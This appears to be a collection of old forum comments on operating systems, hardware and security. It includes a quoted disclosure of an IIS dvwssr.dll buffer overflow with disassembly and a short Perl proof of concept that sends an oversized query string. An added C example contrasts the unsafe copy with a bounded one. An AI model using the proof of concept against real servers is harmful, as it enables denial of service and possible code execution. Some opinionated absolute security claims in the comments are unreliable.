sorry to rain on yer parade but :
That is not correct.
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from accepting incoming connections, at least.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url
So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find these types of bugs...
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
We've been playing a little more trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with
this configuration, we have been able to make the code jump to our buffer.
Under these circumstances, the actual BO allows arbitrary code execution on the target machine.
It's interesting to note that no log is generated as an effect of this attack.
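As an added illustration (not part of the quoted post or of dvwssr.dll itself), the C below reproduces the pattern in the disassembly, an unbounded copy of the request's query string into a fixed stack buffer before unescape_url, next to a bounded version that rejects over-long input before copying. The buffer size, the function names and strcpy standing in for lstrcpyA are assumptions; the 5000-byte input mirrors the Perl PoC.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed stack buffer the disassembly calls
 * queryStringCoph; the real size in dvwssr.dll is not given in the post. */
#define QUERY_BUF_SIZE 256
/* The vulnerable pattern: lstrcpyA(stack_buf, lpszQueryString) with no
 * length check, then unescape_url(stack_buf). strcpy stands in for lstrcpyA.
 * Any query longer than QUERY_BUF_SIZE-1 bytes overruns the stack frame. */
static void vulnerable_handle_query(const char *query_string)
{
    char query_copy[QUERY_BUF_SIZE];
    strcpy(query_copy, query_string);   /* unbounded copy: the bug */
    /* unescape_url(query_copy) would follow here */
}

/* Hardened version: check the attacker-controlled length against the
 * destination before copying and refuse over-long queries outright
 * (truncating would hand unescape_url a mangled query instead).
 * Returns 0 when the query was copied, -1 when it was rejected. */
static int safe_handle_query(const char *query_string, size_t *out_len)
{
    char query_copy[QUERY_BUF_SIZE];
    size_t len;
    if (query_string == NULL)           /* the 'test eax,eax / jz' check */
        return -1;
    len = strlen(query_string);
    if (len >= QUERY_BUF_SIZE)          /* no room for the terminator */
        return -1;
    memcpy(query_copy, query_string, len + 1);
    if (out_len != NULL)
        *out_len = len;
    /* unescape_url(query_copy) would follow, now on a bounded buffer */
    return 0;
}

/* Constructed input of the shape the Perl PoC sends: n bytes of 'a'. Caller frees. */
static char *make_query(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'a', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char *short_q = make_query(10);
    char *long_q = make_query(5000);    /* the PoC's "a" x 5000 */
    vulnerable_handle_query(short_q);   /* safe only because the input is short */
    printf("10-byte query:   %s\n", safe_handle_query(short_q, NULL) == 0 ? "accepted" : "rejected");
    printf("5000-byte query: %s\n", safe_handle_query(long_q, NULL) == 0 ? "accepted" : "rejected");
    free(short_q); free(long_q);
    return 0;
}
```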
the palm has a crappy OS which crashes pretty often (although its database protection stuff ensures your data stays without getting corrupted)..i hate to think of what its like with a wireless connection...there is content mainly the DOC (unrelated to any m$ software) e-books although the palm is difficult to read. battery life is very nice. simple webpages with text only are probably a helluva lot easier for the palms to parse..in general lynx friendly=palm friendly. i wish 3com would improve the OS tho.
i was on the internet at that point mainly going thru whois, telnet (yeah..telnet ports were open and allowed you to login to machines...i even logged into some nasa machines), archie (who can forget that?), gopher (text based WWW type protocol -- you could have continuous connections thru it - really kewl), fido echoes (still around i see) and uucp for new transfers and stuff...i was on an irix box waay back then on a fairly decent link (around 100K or so) and i remember the coffee thing when it started..i think it used to be a simple text type sensor and not a camera..it then evolved if i recall correctly.
put it up on freshmeat as a group under the GPL. someone will find a use for it - whether as a benchmark suite or not.
oh yeah..riight. mainframe processors are sloow. they arent your top of the line number crunchers..most machines now will put them to shame. the mainframe has always been great on I/O but actually use one and you'll see that they dont have the performance of (say) a dual alpha mainboard. IBM rates em in CPW or some other weird figure which gives users no information...they'd be really embarrassed to sell a coupla million worth of mainframe with a benchmark figure lower than that of an alpha costing a couple of grand.
actually linux has more hardware support than most other cheap and/or good OSes so its a helluva lot easier to do it on linux. that said, i think choosing linux over IRIX is a big mistake in this case..some of the machines we use for CT stuff are IRIX boxen with 64 CPUs each and IRIX scales really well...load average of 20 and the machine feels like its a linux box with a load average of 0.0...that with 80 people logged in all number crunching.
umm..*cough* *cough*
here's something interesting :
openssh:
Even though the OpenSSH code checks all input parameters carefully,
internal RSAREF functions can still overflow.
from : http://www.openbsd.org/advisories/sslUSA
some of the other MOOs and MUDs such as the now defunct cybersphere dealt with some problems well (i.e. players getting wiz only weapons would have those weapons degrade after a while) and some badly (i.e. i got kickbanned for exploiting the kill code..when a char died via a kill with a non player object moving the char rapidly sometimes produced an invulnerable "corpse" which could kill but not be killed..very useful...posting a message up on the board proclaiming what i did after exploiting it fully got me kickbanned and toaded)..it all depends on the GM/wizzen and i havent seen even one virtual community with GM/wizzen who could maintain the illusion completely. i guess having infinite power is impossible to keep under control all the time.
the RTlinux project seems to be built for it. also some companies have released embedded linux stuff (including distros) which they bundle with boards. theres also cygnus's ecos which is a gpled embedded os with a smaller footprint than linux.
umm...ssh exploit anyone ? yes, openssh was vulnerable to it. theo's released a few patches for the current version of openBSD too.
umm..i hate to burst your fantasy but -
BSD doesnt support more than one CPU.
Solaris is the #1 ecommerce platform because its more reliable and scalable than almost anything else...including linux.
Hardware crypto support for SSL has been around a long time in linux, NT and solaris on apache, netscape enterprise and every other webserver. just ask nfast.
The sentinel utility i wrote is essentially a tripwire clone with MD5 signatures replaced by the more secure RIPEMD-160 algorithm (and patent free to boot). download at http://zurk.sourceforge.net or http://zurk.netpedia.net...also on freshmeat.
you wouldnt want those commercials if you took 30 mins to download a 1 minute film over your 56K modem and 30 seconds of the one minute movie were commercials. trust me - internet content (specially video) needs to be commercial free. pissing off customers when an industry is just taking off is the *worst* thing you can do.
Are you really saying windows is a secure OS ? Do you know what a friggin pain it is to install windows NT with a read only program file directory or a read only winnt directory ? I took *two weeks* to tune an NT system enough so that applications could load from read only directories (why the hell does EVERY damn application want to write to its installed directory ??). Windows 95/98 dont even have the notion of security so forget about those pieces of utter shit. I've had to repatch *every* NT system multiple times over the course of a few months because m$hit releases such utter crap. Plus their security fixes take forever. if you think windoze is secure, get yourself a good shrink...or try adminning some windoze systems at least once over a period of time.
it depends..fiberoptic interconnects are already dropping in price and if you can get a fast enough bus on your cluster nodes and a fast enough interconnect it might catch up to traditional supercomputers. e.g. if you have 256 SGI octane machines with internal gigabyte per second class databuses connected via improved fiber interconnects (say 16Gbps cards & terabit switch connects) it would equal your supercomputers internal bus. granted, this thing is a bit far off, but not as far off as some people think.
umm..no. the data is encrypted and they'd have to get the keys to decrypt it which the owner of the site doesnt have. the keys are dynamically generated and change fairly rapidly.
simple...the files need to be signed and you need to know the signing key. redhat and other distros have already addressed this and include a signature as part of the files (rpm for example signs everything).
no no no. the point is being made VERY clearly. Its an attempt to show that freenet can be flooded with crap information using a DDos model of attack. unfortunately it seems to be failing gradually as the moderators "vote" and destroy the trolling posters. this is *exactly* the model freenet needs to survive on.
looks good to me : http://blowthedotoutyourass.com/mission_01/mission_01.html
try having some *patience* or check your ip connection.
unfortunately this is an all too common scenario. there are plenty of startups where the management are generally clueless fuckheads and the engineers/coders have to take all the heat from the generally incompetent idiots who run the place. and then they get stabbed in the back by clueless salespeople. The reason the company failed was not because of bad technology per se since a lot of companies exist providing crap, but because the CTO left. Lack of good technical guidance can make or break companies and this is one that broke. Lets face it - this was a fairly decent project and one which could have sold reasonably in the market, if it had been completed & executed properly.
the kernel hackers guide is great - khg.redhat.com is where i got my first taste of the kernel. You can check out a simple driver framework that i wrote at my website (zurk.sourceforge.net)..its a bit old (2.1.132 kernel) but it should give you a good start..if you can understand that much, you should be able to tackle the kernel easily. kernel code is fairly simple.
i dont hate it. it has its places..and i hate people carping about how secure it is out of the box when *nothing* is secure unless you actually look at it with a magnifying glass. i dont like the pace of development (too slow) and the lack of drivers. other than that its just unix.
secure by default is worthless IMHO. a clueless admin can easily botch a secure by default system. much better to let the user learn the hard way even if its more painful. i personally spend at least a full day securing my linux boxen with ipchains, portsentry, sentinel, nmap etc after installation. its a good thing too - you learn a lot.
two celerons = $100
one abit BP6 = $125
SMP = priceless (or $225)
any questions ?
simple. turn off all services in inetd.conf ( or kill inetd ), turn on firewalling in your kernel and execute ipchains to deny all ports input. now try and hack a machine such as this one. you can *never* break a box like this no matter what distro you use or how many buffer overflows are in it. and its more secure than obsd default anyway. happy?